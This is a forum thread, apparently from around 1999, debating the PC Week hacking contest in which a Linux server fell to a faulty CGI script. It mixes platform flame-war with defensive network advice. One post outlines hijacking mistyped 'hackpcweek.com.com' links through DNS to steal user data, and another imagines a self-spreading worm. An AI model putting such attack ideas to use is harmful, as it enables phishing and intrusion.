Someone in the forum on the hackpcweek page was arguing that Mircosoft had configured the NT server, but the linux one was mostly default. I think this probably was the case, when poking around the linux server i noticed that the Apache default dirs manual and icons were still on the server with all the default files in them. While this doesn't really cause and security problems, it lends toword the idea that the Linux/Apache install was mostly default and not configured very well. Since they used a mostly default install they probably also just grabbed an off the shelf cgi script, which is more important because it lead to the crack. Also when the contest first started the Linux guestbook script wasn't even filtering out HTML and javascript, but the NT script was. Which once again points to carelessness with setting up the Linux box.

But regardless of if they were careless or not, thats really a non-issue, the issue is that cgi script was at fault. I'm sure that if this script was running on the NT server, it could also have been cracked.

Re:Test BOGUS. Linux is UNHACKABLE. PERIOD.

[Wah]

There for you must be a Microsoft user sent to make linux users look bad :)
nope,just a troll looking for food. Now he's got some more. Don't Feed the Trolls.

I'm getting a bit sick of this...

[xENTROPYx]

Alright, everyone... I'm not sure about the rest of you, but I'm getting UNBELIEVEABLY sick of these 'security tests'. The platforms that they test are almost never equal, and obviously most of the administrators have no idea what security is. I'm fairly certain that if you put an NT box up against a Linux box, found the top administrators for their respective platforms, and let them configure the boxes THEMSELVES (although requiring some services to be turned on (ftp, telnet, etc.) to simulate a 'real' enviornment.) that both systems would be damn nigh impenetrable. Of course, at that point the only real test would be of the adminstrator's skills, as patches are available for both systems for all of their myriad security holes... (Of course, this says nothing about NT going down of its OWN accord... hehe)

To paraphrase, a system is only as secure as its administrator is skilled.

Dan Attenborough

[DrMaurer]

Fact is, we all know that Linux can squish NT flat. Let's set up a test that proves that.
See the linux user in his native habitat, he's tensed, poised, awake, and banging at his keyboard in anger that someone may have cracked his sacred linux, even if it was a cheap shot. He's letting his real skin show, and it's as ugly as the linux command prompt or the blue screen of death. He wants to set up a test that proves that linux is better. The linux user is unaware that such a test is stupid and proves nothing.
This is an interesting speciman, of course. But the average Linux or NT zealot would all speak the same way. "They know they are the best, so let's set up a test that proves it." It shows everyone that the truth is hard to deal with no matter which side of the fence you are on. They don't want security, they want their way.
Oh no! Here comes Demons and TAO, "the ultimate OS" representatives! Amiga and BE! OH! The humanity, they're squabbling for leftovers! Oh, the elephant of NT is here, trying to trample them all! Penguins are being smashed by the dozens, more and more are pecking furiously at the the elephent. It's getting too much for the pachdyrm, it slumps down and dies. The demon rips off the trunk of the dead evil NT elephant, and the penguins keep pecking and sqwaking, sure of their superiority.
Is that movement in the bush? Oh, indeed it is! I can't quite make it out, but it's grabbing everything and eating them alive! Oh! The humanity!
They never saw what hit them. They were just standing there, all quacking and whatever else they might do, and something ate them all! Oh, my Lord! What predator can do such a thing? Obviously it must be higher on the evolutionary ladder!
We had best get out while we can!
Signing off, and remember, don't ever stand still and gloat and assume your're safe, or you'll get eaten.

Re:Dan Attenborough

[quux26]

See the linux user in his native habitat, he's tensed, poised, awake, and banging at his keyboard in anger that someone may have cracked his sacred linux, even if it was a cheap shot. He's letting his real skin show, and it's as ugly as the linux command prompt or the blue screen of death. He wants to set up a test that proves that linux is better.

Like an NT user, of course I have my preference and biases. I also believe that Linux is not only a better security platform, but philisophically as well. I'd use it even if it was shown to be less secure. But it doesn't matter what I believe to be true, does it? It must be tested.

I think that the layout of the challenege was poorly stated, but this is merely Monday-morning quaterbacking at it's worst.

Again, if it was NT that was broght to it's knees, nobody would be uttering ANYTHING about "second chances", and that bugs me a bit. But do I have some sort of inbred, insatiable desire to make sure Linux wins at all costs? Hell no. I am a scientists to the core, and the truth can always be questioned. I hope Linux comes out on top ...I sincerely believe that it will ...but it's my responsibility to be open to an alternate outcome.

My .02
Quux
http://www.intap.net/~j/

My .02
Quux26

Yum.. CGI script hack..

[Weezul]

It's kinda funny.. the OS is frequently like one of the most secure links in the chain on either Linux or NT. It's oftin the custom software which is vulnerable.. PHP's default behavior for example is to place all form variables into the global name space. Not a big deal to fix since you can always initialize a variable before you use it if it should not be comming from a form, but it is dangerous.. I seem to recall VBScript having related problems.. and I could be wrong about this, but I believe itwas a pain in the ass to even SQL safe form vars in VBScript. Just think of how many credit card taking pages out there are in VBScript.

Now, people worry more about OS/daemon hacks since then script kiddies can use them, but the serious cracker who really wants to fiddle with your data driven site can do wonders.. What would be especially cool is to see an AI that could crack database driven VBScript pages by guessing probable programmer mistakes.. and say propogate it's self as an ActiveX control into the pages. Now, that would be beautiul since there wouldn't really be crap MS could do about this little worm.. it's the developers fault.. never mind that MS didn't give them the tools to try and prevent it.

Anywho, the point being.. we should expect more serious exploits of this form in the future.

Jeff

BTW> It would be kinda cool to write a PHP script analysis program which looked for security holes.

Re:Yum.. CGI script hack..

[Pike]

"Just think of how many credit card taking pages out there are in VBScript."

Very few. Most use java script if any, since Netscape doesn't do vbscript. Unless you mean ASP, which is all server-side anyway and very transient.

Sounds like a valid result to me

[Gavin+Scott]

"and this is obviously not an OS test."

If you take 100 users and tell them to set up a challenge like this, and in more cases the Linux box ends up getting cracked and the NT box does not, then Linux "system" is clearly less secure, regardless of whether it is the Kernel, a subsystem, an add-on package, the documentation, the ease of use, or the user's own idiocy that results in the break.

These days systems like Linux and NT are so absurdly complex that you can't talk about the
security of "the operating system" in isolation.

And before you label me a MS troll, let me say that I think both NT and Linux are really lousy operating systems. They are like the left and right extremes of the political spectrum. On one hand you have the totalitarian Microsoft OS ("You *will* use it the way we tell you to") and on the other you have Linux (i.e. Unix) where everyone can have everything any way that they like, and as a result nobody can agree on what the functionality should be for any component that's higher up the evolutionary ladder than a Lego Brick.

Unfortunately most of you reading this will have grown up knowing only these two extremes, and probably have never seen an operating system that is really there to help you get the job done quickly and efficiently. Unfortunately most of these elegant and effective OS products have all but died out today because of all the foaming, heat-seeking, lusers drooling over the latest trend they read in Computerworld.

One day there *will* come a Great Operating System(tm), but it's not going to be Windows (and Microsoft probably won't write it), and it isn't going to be Linux, and it isn't BeOS, and it isn't MacOS, or any of the other current options, so as you wipe the spittle from your mouth after your latest /. Linux/NT flamewar, pause and reflect for a moment that maybe there might possibly be a beter way...

G.

Re:Sounds like a valid result to me

[fat_mike]

Damn, I really miss my Tandy Color Computer and TI/94a. Now there were a couple of secure systems. :)

Re:Sounds like a valid result to me

I agree with Gavin. All this computer stuff going on around us...all of us who make our livings with computers...Let's all just drop them until something better comes along. But if *we* all drop it...how the hell is something better ever going to come along?

Re:Sounds like a valid result to me

[beme]

Isn't there always a better way? Doesn't mean we should just drop everything and wait for it to come along...or was that not what you were getting at?

Was it really a suprise?

[richj]

I pretty much expected from the get-go that Linux
was going to come out in a negative light. I'm not suprised in the least.

Is it inept management, editors, and journalists at Ziff Davis? Are they just favoring their biggest advertizer? A lot of both?

Most of their articles are geard torward non-technical, upper management, and this kind of publicity for Linux isn't good at all, and they know it. There was a firewall, nonstandard configurations--the list goes on.

Traditional media would never be able to get away with a similar test which more of the public can relate to. Imagine an article in a major newspaper claiming one airline was better than another, no facts or evidence other than because a reporter flew on it once without crashing. Now imagine if that airline was one of the newspaper's main advertizers.

The public would never stand for it, the paper would lose credibility, and that would be it. But Ziff Davis can get away with it because most of the people who *would* be influenced by a story such as this don't know any better.

A little objectivity would go a long way, and until I see that from Ziff Davis, I'm not going to patronize any of their advertizers. When asked for reccomendations at work or with companies I consult for, I'm going to weigh whether or not the vendor/product in question supports a company with such poor journalistic values.

In fact, I'm going to type up a letter and send it to the companies I don't use, telling them why I went with "the other guys".

I'm not asking for pro-Linux articles when they're not due, just a little fairness and competence in reporting from some of their journalists.

They know who they are.

So true...

[Signal+11]

Man, that is just too funny. :^) And so true. If I had moderator access right now, I'd +5 you.

--

No One Watching the store

[just+someone]

It's what 9 hours after the hack (if jfs' note is EDT), and there is still no one at PC week has written an article, or even POSTED a linux pcweek hacked, details to follow.

Of course not, "Fed's leave MS alone", and "The MS strategy" is much more important to PCweeks advertising base.

http://www.zdnet.com/zdnn/stories/comment/0,5859 ,2340919,00.html

http://www.zdnet.com/zdnn/stories/comment/0,5859 ,2340416,00.html

Why keep doing this?

[imac.usr]

What is the point to all these crack-my-box tests? Every day, this sort of thing goes on in the real world; that's where the real testing goes on. This whole artificial set-up-a-box-and-leave-it methodology is not analogous to the real-life version of setting up a secure webserver, patching holes in security, applying maintenance updates, and all the rest of the work that goes into it.

My webadmin experience is limited to Apple's Personal Web Sharing (only serves 10 connections at once but it's perfect for testing your personal site's HTML links), a default Red Hat 6/Apache combo at work that pretty much only serves two pages (three if you count the default "It worked!" page), and a just-installed copy of Mac OS X Server on my iMac at home; obviously, I'm not what you'd call a fully-qualified expert on the subject. But even I know there's much more to webadmin than what these tests show. It's an ongoing process, not something that can be decided in a week's worth of testing. Anybody basing their webserver or OS decisions on these tests doesn't deserve their own parking space and thousands in stock options, because they're not doing their job.

That said, if PC Week was out to prove which OS can be hacked easiest, X Server would have been an interesting third choice. It ships with almost every service disabled by default, forcing admins to explicitly choose which ones they activate, and it does a fair job of warning when something isn't secure (like storing your server on an HFS+ disk instead of UFS or something equally silly). Hell, if WebStar on plain old Mac OS is good enough for the US Army, BSD-based X Server should have at least been mentioned. Then again, as others have pointed out, the magazine's name is PC Week, not OS Week.

Testing this stuff isn't like running Whetstone on two different versions of the same chip. It involves more work than picking the winner of an artificial and impossible-to-quantify "test".

Or am I just bitter because I work in the black hole of the seventh hell that is tech support and not on the thirty-eighth floor as a golden child of the IS department with a window, a phone that never rings, and a job that involves nothing more than reading PC Week? :-]

I knew it!

The great results on this test just go to show you how bad Micro$loth Windowze is and how easy it is to hack and how it is such junk and....

Oh, you mean LINUX got hacked? THE TEST WAS FAKED!!!

knee jerk reactions

[AshleyB]

Why is it than every time an NT box is hacked everyone says "See, Windows sucks" but when a Linux box is hacked it's human error? Seems to me like a stereotype for Windows and a stereotype for Linux has developed and is used to fortify or denounce these situations all the time.

Excuse me for being anal retentive, but...

[mochaone]

will it require Solomonic ruling or a Solomonesque ruling?

This is just silly

[gregm]

Already we're seeing posts like "why don't the hackers leave the Linux box alone and go for the nt machine". My god how could anyone post this here at Slashdot? Think of the quote you just gave Microsoft:

"Users at the respected Linux website, Slashdot, plead with hackers to pick on NT and to leave their Linux server alone"

And how about this one. "it was a third party closed source script and not the os's fault".

Here's the headline
"Security Update: CGI-script designed to run on Linux/Apache server allows root access" (I don't think that's what happened but hey once it's in print who cares)

This article would go on to read:
A cgi-script written for the free Linux operating system and the free Apache found faulty. Sources won't reveal the name of the script and no attempt has been made to correct this problem.
Guess you get what you pay for.

written by our fav
Jessie B

We can't stop these stupid contests from going on but we can use some of the tools that the "man" uses to our benefit. Ignoring them comes to mind.
Slashdot has to walk a fine line... they are a news page first and foremost and they happen to like Linux a lot. Slashdot has an obligation? to report and no one is paying them to kill a story unlike, I'm sure, some of the other news sites/journals.

Please Slashdot just say no(tm) to stupid hype and don't post every friggin contest that comes down the pike. These articles may make for interesting/inflammatory reading but they're doing a disservice to the Linux community, nay the entire computing public.

A $1000 gift certificate...

[gsfprez]

will buy the guy a decent computer to run Linux on and run a web site.

It won't pay for the same system if he wanted to install NT Server on it.


That's me.. always thinkin...
___
"I know kung-fu."

Re:A $1000 gift certificate...

[cswan]

And if he cracks it four times in a row he can buy the lowest-end G4 system from Apple :)

Re:A $1000 gift certificate...

.... and have the most secure server there is.

Troll

[Megaweapon]

Linux lost, Linux is to blame.

No, Troll, poor CGI administration caused the crack. A poorly crafted CGI can crack any platform.

Re:Troll

A poorly crafted CGI can crack any platform.

This is plain WRONG. I cannot believe that any computer user can fail to realize this. A CGI is designed to take some inputs and give an output. In a properly designed/implemented OS, it could be forbidden to do anything else, than read and writing to already opened file descriptor (for instance). In that case it is impossible to crack the machine/OS via the CGI, except for OS bugs (VM, TCP/IP stack), which is two orders of magnitude harder to exploit (and if it was the case, then maybe the Linux machine would have lasted longer).

Unix security has always been utter crap, and only securelevel/capability can save it. Both are seldom used (at least out of the box, and worse not used by the program), so it is safe to say that Linux security is upper crap, unless spending a huge amount of time fixing it.

Re:Troll

A CGI is designed to take some inputs and give an output. In a properly designed/implemented OS, it could be forbidden to do anything else, than read and writing to already opened file descriptor (for instance). In that case it is impossible to crack the machine/OS via the CGI

Wow! you're correctomundo on that one my friend!!! Damn these brainy software engineering and security experts keep proving how WRONG we are ... This guy is likely the network security and software engineer for some huge multinational bank.

Re:...Jesse Burst?

[fat_mike]

I'm sorry, I'm not familiar with this person. Who does this person write for? Matt

closed source CGI does not matter

[CmdData]

You said it was not the OS but a closed source CGI script. Isn't every CGI script on that NT box closed source too? I think so.

Re:Must Resist

[Suydam]

I use Linux because I enjoy it, not because it is "hack-proof"

Unfortunately, many companies DO use Linux because of it's relative security (when compared to NT). Even though we know that using a closed source CGI script isn't a fair way to test an open source OS, PC Week may not have known that...and the pointy-haired people who all just bought Red Hat stock might now have second thougths.

That's why it's important for some people to at least contest this sort of blatant falsehood publically. But how?

Okay, why don't you post your IP?

You want a test? Give us your IP. I'm sure all of slashdot would love to have it... :-)

Definition of "Fair Contest"

[NiTRiX]

fair [fãr] adj pleasing to the eye; clean, unblemished; blond; clear and sunny; easy to read; just and honest...

contest [kon-test'] n a struggle for superiority; strife; debate...

Undeniably, there is no such thing.
In a struggle, there is always an advantage. There is always a disadvantage aswell. On the internal, an NT footwasher would do his best to make NT win, and a Linux puppy would do his best so Linux would come out on top. Then you have all the variables of the integrety of the hardware and the protocols, regaurdless of the fact that this was a beligerant CGI mistake.
The common statement is being held that the system is only as good as it's admin. That is all fine and dandy, but do to recent discussions with a close friend of mine, I've come to a conclusion about this world... it is a sad, sad day when, in order to make it to the top you must lie, cheat and steal; and an honest person will never be trusted.
I give you Clinton; I give you Gates; I give you Fidel Castro; I give you 65% of Congress; I give you Nike; I give you the majority of today's entertainment industry; and I give you every political leader of this world.

"No Fair!" is what my 12 year old sister says when I beat her in Monopoly.

So what's my point you ask?

Computers don't make mistakes, people do.

Re:...Jesse Burst?

[pluteus_larva]

He's the anti-Linux, pro-MS columnist for ZDNet. You can always find his latest drek here.

Put your machine where you mouth is

Disable file and printer sharing and give out your IP Mr. Security ;)

Re:Real world usage.

[emag]

I don't know.

I guess I've just always been of the belief that it's a Really Bad Idea to have your firewall hit unnecessarily. IOW, put the web server outside the firewall, probably on its own subnet off the incoming connection. That way, if the machine IS cracked, you don't suddenly have to worry about all your non-hardened hosts being hit from a supposedly trusted machine.

After all, once you're through the firewall, you're through the firewall, and it won't protect you anymore. If you happen to be running bad CGI, or ColdFusion, or somesuch which just screams "Crack me!", you're probably in for a much larger world of hurt if you think everything is already protected.

I know I didn't come up with that idea myself, so I must have read it someplace and it made sense. Of course, I tried proposing this at the last place I worked, and ran into a lot of resistance. They didn't want to use an old Pentium/MMX 166 for that, even though they were replacing all the secretaries' machines with PII/400s. So this probably WAS a real-world scenario.

I still contend though that the best security policy is to trust nothing, not even the firewall.

Trolling about

First of all, the operating system is not in question. If you want a comparison of operating systems, look at uptime in a *real* environment, not a lab. Secondly, this is a battle of clueless and the cluefull. The cluefull usually don't respond (if only to make fun of the *massive* ammounts of idiots on /.) because they know why things are compromised. The clueless get a bur up their hind-end and decide to go on a rampage touting one thing over the other. Security is simply the test of the administrator, not the OS or it's components. IMNHO, If someone was clueful and looked at a track record, one would not use IIS, one would use apache.. even on NT.. simply 'cause of the audits of the source by many many different organizations. IIS gets audited by MS, who also audits Win98.. 98 produces BSoDs quite a bit. Odd. I think you people need to get read a damn book and get a clue.

whiny children

God, do you have any idea what this forum must look like to an NT admin if he were reading right now.
"What a bunch of whiny bitches"...first thing that came to mind. Second thing...didn't get that far because I was so friggin' annoyed by the general whiny-ness that purveyed....AHHHHHH. You can tell yourself how great Linux is all day long until you are blue in the face and the cows of come home and hell hath frozen over, but if you are simply going to react to problems by crying about it, it does no good...none. Once again, I am humiliated to be associated with this group of people...I have to go to work now, and face a bunch of NT admins that watch /. for this kind of shit and put up with their endless tirades about how "childish and whiny all those /.'ers are". And the annoying thing is that they are _right_. They are...every single time someone comes out and says anything bad about Linux, anything at all, there are two reactions.
1) The people who fuck the prom queen sit down at their computers and do something about it.
2) Everybody else gets to bitching about how unfair it is....God I HATE THIS SHIT!!!!
I feel like I am amongst a group of twelve year olds on a playground who don't care to try to think things through logically. People like that suck...we are supposed to mature professionals here and this is what kind of response we get....fuck this...fuck /. and fuck all the whiny bitches. If anybody wants to get hold of me, I will be seriously questioning the reasons as to why I bother with this shite at all. skippy@DIEbasil.SPAM.stthom.DIEedu

Re:whiny children

Grown ups don't hang out here ... you think Linus and Jordan Hubbard are posting whines to this site. BTW I'm only 15 ...

Wait a sec... If memory serves me correct...

[Liquidy]

Wasn't it PCWeek that did that "independent" evaluation which ultimately backed up the results of the Mindcraft benchmarks?

That certainly doesn't lend to the credibility of these evaluations...

Balance

[Etriaph]

I think in order for this to have really been a fair challenge both systems should have been running the same services, maybe different daemons where possible, but the same services nonetheless. The scripting language for both web servers should have also been the same, something embedded so that neither could be blamed, and the scripts equally the same. They were supposed to test the operating systems against security attacks, not a cgi script. If the same script were running on the NT box, it could have been just as easily hacked.

Personally being a Linux user I think it's a cheap shot to give someone cash for hacking a CGI script, when someone should be given cash for hacking the machine itself and doing something bad to it. Perhaps Red Hat (only as an example, any distro would do) and MS should go head to head in a fair and square competition by leaving a machine with equal hardware capability, configured to the max by engineers from both companies, in a neutral person's care in order to watch over them. Then let the world try and hack them. That will satisfy me.

Real world usage.

[Anonymous+Freak]

First, I agree, they really needed to have put up the RH config info.

Second, as to the firewall, they specifically stated that it was meant to approximate a "real world" situation. Thus, they used a firewall to prevent "stupid" attacks, like DOS. How many real world servers are all alone in the night? Not that many. Most (smart) admins put some kind of firewall in the way. That is what PCW did.

As to their apparent lack of Linux-saavy? Well, I would have liked it better if:

1. They had an NT expert configure NT, and a Linux expert configure Linux, or
2. They had a joe-shmoe admin, that knew equal amounts about both OSes (i.e. little about either) configure both, with default, or nearly-default settings on both.

Remember, for a real world test, you should have a real world configuration, not an artificially extra secure one, or one that takes so many tweaks that no professional sysadmin would spend the time applying all of them. I, for one, would rather spend an hour configuring a mostly secure NT box than spend two days configuring a perfectly secure Linux box. (Or vice versa, whichever happens to be true at the time.)

Remember, time is money too. My boss lets me play with Linux all I want during spare time, but when I have to make the server work now, he doesn't want to wait the extra three hours while I get the Linux box perfect. He'd rather have the NT box "good enough" now. Admitedly, I'm an NT-guru, and I'm fairly new at Linux (only 3 years of experience, but I'm geting better. I've had my home server running flawlessly for multiple months now) but I think I know enough that it shouldn't take me 10 times as long to do the same tasks.

And just so you don't think I'm too GUI-happy, I loved my DOS box, and still use the command line all the time in NT. (I have the services for UNIX installed to make it a really happy NT box.)

Okay, <rant mode off>

Re:Real world usage.

[Yakman]

I guess I've just always been of the belief that it's a Really Bad Idea to have your firewall hit unnecessarily. IOW, put the web server outside the firewall, probably on its own subnet off the incoming connection. That way, if the machine IS cracked, you don't suddenly have to worry about all your non-hardened hosts being hit from a supposedly trusted machine. After all, once you're through the firewall, you're through the firewall, and it won't protect you anymore. If you happen to be running bad CGI, or ColdFusion, or somesuch which just screams "Crack me!", you're probably in for a much larger world of hurt if you think everything is already protected.

What you do is have two firewalls and have the webserver sitting between the two.. your corporate network behind one, and the Internet behind the other. That way if your Webserver is compromised the attacker still can't get through the internal firewall.

Overly simplified, but you know what I'm getting at ;)

Why the weeping over linux? The NT is vulnerable

[Alascom]

The NT box is still up, and CAN be hacked. I know, I already found a workable hack to steal user information from the NT server. Of course, will I still get $1000 for being the first to compromise the NT Server or is the "contest" officially over... Anyone know if it still going on? or should I just post how to hack it. -Alascom

Why hasn't the Linux PPC been cracked yet?

[thundrcast]

There have been several trolls here about Linux being insecure. We all know that secruity is a function of the attention paid to it. Linux is more secure than NT only with carefull attention. We may never know how much attention was paid to the Linux box, but we do know that here have been other Linux boxes out there that have yet to be cracked. So, before people start saying that it is a Linux problem or whatever, please explain why the Linux PPC challange has yet to be cracked. Last I checked, it only crashed once while the NT2000 has gone through almost a dozen code revisions in the last month. In closing though, I think this does somewhat prove that NT's security is up to the challange... now if they could improve the stabitly!

Interesting argument you make

[Zico]

The only problem is that this only shows the resiliance to script-kiddies. Most of the serious intruders (you know, the ones who do this kind of thing for PROFIT) would never be so stupid as to take part in such a contest.

So basically, you're saying the Linux box is capable of being cracked by someone with pretty much no skills whatsoever.

Well, now that must certainly be a comforting thought to the IT managers of the world. Gee, I'd hate to see what kind of disaster would result if a hacker who actually had an ounce of skill decided to go after a Linux box. Oh wait -- I have .

:-) :-)

Cheers,
ZicoKnows@hotmail.com

No one has hacked the NT machine ...

ladeedah ... See subject: the fact that no 3L33T /. readers have been able to hack the thing is evidence enought for me that in this case NT is more secure. I don't think that NT system will be hacked either. DOS would be easy enough but ... Why is is so hard to accept that NT just *is* more secure (out of the box anyway). It's logical: NT offers fewer services so there's fewer holes. You could make a minimalist web server only Liux box and harden it pretty well but you'd have to know what you're doing. securent.hackpcweek.com just isn't that easily crackable and most hackers are lazy ....

It's Karma

[Compay]

I think it's only fitting that the Linux box got cracked first, even if it was sort of a cheap way to do it - not because NT is a better designed or more secure OS (yeah, right), but because of all the fire-breathing anti-MS fanatics who think that even in the hands of a newbie administrator Linux servers are more secure than Fort Knox. (I refer any readers back to some of the /. posts when Hotmail was cracked - many people immediately assumed it was an NT problem without knowing any of the details.)

The best aspects of open source movement are its emphasis on choice and community - contests like this make some of the open source folks look like the same kind of supercompetitive, manipulating people they usually bash.

Re:It's Karma

Is this the same "community" that cheered when an anti-Linux person died? Or the same "community" that commonly makes fun of Windows users because of their "choice" of OS?

Hmm........

Remember Billy Mitchell

[biomech]

The only real rule for his contest was to sink the battleship. Of course, after he did, the Navy came up with all sorts of reasons why it wasn't really a fair test. Howsomever, the ship was still sunk - and the LINUX server is still hacked. It's time for he who called the tune to pay the piper.

Who wrote the CGI script, what was it used for?

[AxelBoldt]

And what was the bug?

--

Lose / Lose situation

[TreeRat]

Bottom line, no matter what the outcome, it could never have been to the advantage of Linux.

If NT had lost, Microsoft would have found a non-microsoft blame (Such as this CGI problem). If it turned out to be a microsoft problem, they would have thanked everyone for the help in finding a new bug, or would have said the problem is already known and will be fixed with the next service pack. Outside of being able to brag on Slashdot, there would be little advantage to a Linux win.

With Linux losing, it gives Microsoft yet another piece of garbage to toss into their FUD campaign. It won't matter to those IT managers that it was a faulty CGI script... heck, they could have posted the root password on the index.html and Microsoft would still crow about their "victory".

Ah well.

Re:Must Resist

[IntlHarvester]

what is PC Week? It is a magazine oriented towards Windows users.

Actually, it's a magazine for managers of PC networks, not "Windows users". Maybe you are thinking of "PC Magazine".

This means lots of Novell, NT, and Linux coverage. Those are pretty much the most popular PC server platforms right now. Most of the advertising in PC Week seems to be for network hardware and software. There are very few straight Windows user applications being advertised.

Of course, the #1 vendor for these folks is Microsoft, so there is a huge amount of MS coverage. (But contrary to Linux paranoia, not every PC network manager is a MS drone. Simply that most IT shops have a vested interest in MS's plans and legal problems.)

Re:...Jesse Burst?

[Pope]

He's anti-EVERYTHING compared to MS.

He's routinely roasted in the Mac press for being a total idiot and spreading anti Mac FUD.

His only comment when spewing his usual trite, unresearched shite is that he's there "to stir things up."

Sounds like what he's stirring is at th bottom of my septic tank.

PPoE

Scientific method

Not wanting to slate you or anything but as a scientist you should know that generally it is better to test and then draw conlusions than to set out to prove something with a test. Alot of this "monday morning quarter-backing" would be avoided if that was the approach used when setting up and observing tests.

It's called putting your money where your mouth is

[Zico]

They should have left the Linux box alone and concentrate on NT.

LOL. Come on everybody, join me in sticking my fingers in my ears so that we never have to test Linux for flaws or ever hear any bad news about it and we can go to sleep at night with the fantasy that Linux is perfect while we dream of dancing and prancing together down Magical Gumdrop Lane. Your post is classic, man!!

Sure, the Linux kids love to talk about how secure Linux is and NT isn't. But when it comes down to winning $1000, this guy knew which computer he'd have a better chance of breaking into.

Personally, I hope this is the last post we see on this contest -- I'll be disappointed if neither of these boxes are broken into in the future. Of course, if they do decide to announce it here when the NT box gets cracked, it'll be amusing to see all the whoopin' and hollerin' from the people who are today telling us that this contest means nothing.

On a side note, I do like having those two boxes around, because they're handy for testing stuff out on without worrying about legalities or damaging my own equipment.

Cheers,
ZicoKnows@hotmail.com

Re:Why the weeping over linux? The NT is vulnerabl

[Alascom]

That rant of yours in very funny. Let me explain that securent.hackpcweek.com IS vulnerable. The problem isn't NT however, its in the HTML code
on the server. Similarly, the Linux wasn't vulnerable, but the CGI script was. YES, SECURENT CAN BE HACKED. You heard it here first. The
rules state: break into the system, modify pages, and/or steal user information. Well, according to those rules it can be broken. Let me explain. I
examined the SECURENT html source and noticed several links to "www.hackpcweek.com.com" (notice the extra .com). Then I contacted Curt Connell with EDS who is Administrative contact for COM.COM. (Please don't call or bother him anymore). A simple 'A' record in the .com.com
DNS server refering 'www.hackpcweek.com.com' to my own web server would allow me to steal user information. Whats more, the user would b believe they were still on a real "pcweek" server seeing valid pcweek documents, allowing me to send malicious code, request confidential information, etc. Curt was unable to get "official" EDS permission to create the 'A' record, but the hack is valid and does exist. (Again, please do not
bother Curt anymore). A simple goof in the HTML code renders the NT box 'hackable'. A side benefit is we circumvent the Firewall, IDS and other security features by just directing to another site. Oops. The NT 'IS' vulnerable to attack. In closing, don't consider an operating system insecure based on the applications (or HTML) thats on it.

-Alascom
alascom@dc2600.com

security should be enforcable by OS

I've seen many posts here about how the security flaw was the responsability of the CGI author or sysadmin.

Yes, under Unix this is true, but because Unix does little to enforce a security policy.

There are other operating systems, mostly dead, that do enforce security AT THE OS LEVEL. Perhaps they died because they demanded too much of the CPUs in their day, or possibly because they inhibited code development. Both are not issues now -- you do not need to do code development on your high-profile service machine, and most servers today barely tax their CPU (IO is another story).

Multics and Apollo notably had strong security designed into every part of the operating system.

Unix's design assumes that everyone knows what they're doing and handles all possible exceptions themselves. Ten billion (sendmail|ftp|telnet| X) exploits later ...

--Pat / zippy@cs.brandeis.edu

DMZ (was: Re:Real world usage.)

[Robert+Bowles]

For those unfamiliar with the term DMZ, it stands for De-Militarized Zone. The notion here is that you have:

1. The Internet.
2. A firewall
3. The DMZ -This is where your Webservers go. They should be running minimal, secure services, static (ro) data, cgi's, etc.
4. Another firewall. - only allow access from the DMZ into your production net where absolutely needed (database, etc.)
5. Your internal network.

Additional good ideas are:

1. Use the "--rtfm" flag. There are tons of FAQ's out there that tell you to choose cryptic passwords, turn off services, limit access to needed IP's only.
2. Use NAT and private IP's. This is not a cure-all, but it is alot more annoying to crack an IP that you can't get a route to.
3. Disable network access on your routers. Get a serial-console server and place it somewhere well protected.
4. Sacrifice a goat.
5. Use sanity-checking application proxies. For example, if your web-servers need "write" access to an oracle database, install a proxy that verifies SQL queries against the set of queries that you've installed on your webserver.
6. If in doubt about using a restrictive fw-rule or policy, use it. If this breaks your application, you can remove the rule.
7. Install bogus services (and log activity). Most "original" cracks aren't instantaneous, they usually involve some poking around.

The real results of the test

[Trick]

Hey, it's a valid test. After four days if merciless attempts to compromise the system, they've determined beyond a reasonable doubt that nobody at PC Week has a clue when it comes to Linux.

This is news? :)

NT admin

NT admin

ROFL

[offtopic] a gender neutral way to say it

[zoomjuice]

While s/he (so as not to offend all those female crackers :) didn't exploit an OS-specific hole

Write it this way: "While they didn't exploit an OS-specific hole" ...perfectly good English, and perfectly gender neutral.
--

The Linux community...

I think another letter summed up the belief of quite a few Linux advocates: Even if Linux was less secure he'd STILL use it because philisophically I guess a bunch of rich mutha IPO holders get to laugh their asses off while a bunch of pimple popping idiots slugging away in their parents basement pump out slave code. Sign me up!

Every day I have to deal with a couple of slackjawed Linux idiots that would tell you Linux cured cancer and fed the starving if there wasn't someone like me to slap some reality into them. NO ONE likes a liar, and the reality is that most Linux troglodytes are exactly that: A bunch of overselling cult members that'll do anything for their god Linus.

Ease down and stick to facts. Ironic given the grotesque overuse of it, but Linux enthusiasts produce FUD on a per capita basis that makes Microsoft look like a gross underperforming. It is humorous but when it affects real business it can be very bad.

Half a clue...

They'll probably decide to hire someone with half a clue as to administering a Linux system too. He got in through a faulty cgi script?!?!?!?!?! Good God, what idiots are running PC Week's systems? No doubt they had an NT expert set it up (I wonder how many times he ctrl-alt-del before he learned not to...). It can be a tedious challenge to make any server secure and still allow access to certain services, but the cgi leak is a joke. This is NOT the fault of Linux nor is it the fault of Apache - they were simply doing what the system administrators set it up to do, which in this case was to allow access through buggy cgi. I hope they pass on the $1k cost to the cgi author and get smart and use OSS for their cgi. Closed source means it had to be commercial too - so much for commercial software...

Disclaimer - this is all assuming that this was a genuine test. Popular opinion and historical evidence leads one to believe that PC Week is devoted to Microsoft to a fault and would do NOTHING to offend Microsoft or Microsoft oriented advertisers. Since making Linux vulnerable to cgi exploitation can be done simply by altering some permissions (something any bonehead administrator would know to check) I wonder if PC Week isn't instead investing $1k in some pro-Microsoft publicity...

Is the NT site really running Windows 2000?

[knarf]

A comment in the /default.asp page suggests so:

go to http://securent.hackpcweek.com/default.asp, view source and scroll all the way down. There's a comment there stating the following:

!--second column--!--This site runs on Windows 2000!--

Fact or fiction? Maybe they just copied this from the www.windows2000test.com site...

Nanotechnology and Security and Cloning

[fat_mike]

I wouldn't worry too much. Eventually nanotechnology and cloning will be perfected. Then we can have teeny, tiny little Arnold Schwarzenagers(sp?) ala Terminator living in our firewalls and servers blowing away any malicious packets.

"Vittle evectron, I vill terminate you"

But then somebody will will create itsy, bitsy Sylvester Stallones.

Matt
"And knowing is half the battle, YO JOE!"

Who says this is a loss?

[rjstanford]

Doesn't anyone check their sources anymore? I know this is /. but geez, folks. From the HackPC website:

For this security test we are testing not only the web servers or operating systems, but instead we are looking at entire programming models. By taking this approach we can pinpoint direct areas that need improvement, and report back to our readers how to build better application no matter what software they choose.

Why aren't those among us who consider OpenSource the panacea to solve world hunger cheering? This was not set up as an OS vs. OS test, but as a platform-stressing security test. The verdict? Closed source CGI scripts can contain security holes. Isn't this a good thing for PC Week to be talking about?

